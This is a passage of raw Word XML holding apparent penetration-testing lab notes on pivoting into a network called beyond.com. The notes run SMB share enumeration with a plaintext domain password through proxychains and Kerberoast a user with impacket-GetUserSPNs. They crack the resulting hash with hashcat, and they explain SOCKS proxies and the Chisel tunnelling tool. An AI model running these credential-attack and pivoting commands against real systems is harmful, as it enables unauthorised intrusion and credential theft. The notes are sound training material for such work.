        <w:t xml:space="preserve"> to list the SMB shares and their permissions with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--shares</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Because CrackMapExec doesn't have an option to specify an output file, we'll copy the results manually and store them in a file.</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains -q crackmapexec smb 172.16.6.240-241 172.16.6.254 -u john -d beyond.com -p "dqsTwTpZPn#nL" --shares</w:t>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t xml:space="preserve">Next, let's use Nmap to perform a port scan on ports commonly used by web applications and FTP servers targeting MAILSRV1, DCSRV1, and INTERNALSRV1. We must specify </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-sT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to perform a TCP connect scan. Otherwise, Nmap will not work over Proxychains.</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo proxychains -q nmap -sT -oN nmap_servers -Pn -p 21,80,443 172.16.6.240 172.16.6.241 172.16.6.254</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000976">
      <w:pPr>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t xml:space="preserve">Next, we found that a website was open on 172.16.6.241 that we want to browse, and we could use SOCKS5 proxy and proxychains to browse, but Chisel provides a more stable and interactive browser session, so we will use that. Look at the the  "Tunneling using Chisel" for more information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000978">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000979">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000097A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Later in the same module, we found that a user (daniela) was kerberoastable using the pre-built "List all Kerberoastable Accounts" query. So, we can perform Kerberoasting on Kali with impacket-GetUserSPNs over the SOCKS5 proxy using Proxychains. To obtain the TGS-REP hash for daniela, we must provide the credentials of a domain user. Because we only have one valid set of credentials, we'll use john.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000097B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000097C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5024438" cy="3124169"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="431" name="image417.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image417.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId198"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5024438" cy="3124169"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000097D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.6.240 beyond.com/john</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000097E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000097F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's store the hash in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/kali/beyond/daniela.hash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and launch Hashcat to crack it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000980">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000981">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2374900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="291" name="image281.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image281.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="689"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo hashcat -m 13100 daniela.hash /usr/share/wordlists/rockyou.txt --force</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009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84">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vxkjph5mq543" w:id="83"/>
      <w:bookmarkEnd w:id="83"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000985">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000986">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKS (Socket Secure) proxy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">general-purpose proxy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that relays TCP (and optionally UDP) traffic between a client and server through a middleman. It's commonly used for:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000987">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tunneling traffic</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> through firewalls or NAT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000988">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bypassing network restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000989">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Anonymizing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> connections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000098A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unlike HTTP proxies, which only work with HTTP(S), SOCKS proxies are lower-level and can work with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">any protocol</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that uses TCP (like SSH, SMB, RDP, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000098B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000098C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It is often seen in the context of "dynamic" ports, like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000098D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="224"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -D 1080 user@target-ip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000098E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="224"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-D 1080 tells SSH to start dynamic port forwarding on local port 1080.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000098F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="224"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Dynamic" here means: create a local SOCKS proxy server on that port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000990">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="224"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, this is a SOCKS5 proxy (modern and supports DNS over the tunnel).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009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92">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_z3p35m1x7cma" w:id="84"/>
      <w:bookmarkEnd w:id="84"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to download Chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000993">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000994">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId200">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/jpillora/chisel/releases</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000995">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000996">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000997">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000998">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel_windows_amd64.gz – for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 64-bit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000999">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel_windows_386.gz – for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">32-bit </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000099A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000099B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gunzip chisel_windows_amd64.gz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000099C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv chisel_windows_amd64 chisel.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000099D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rename it for convenience</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000099E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000099F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel_linux_amd64.gz – for 64-bit Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel_linux_arm64.gz / chisel_linux_arm.gz – if you're on ARM architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
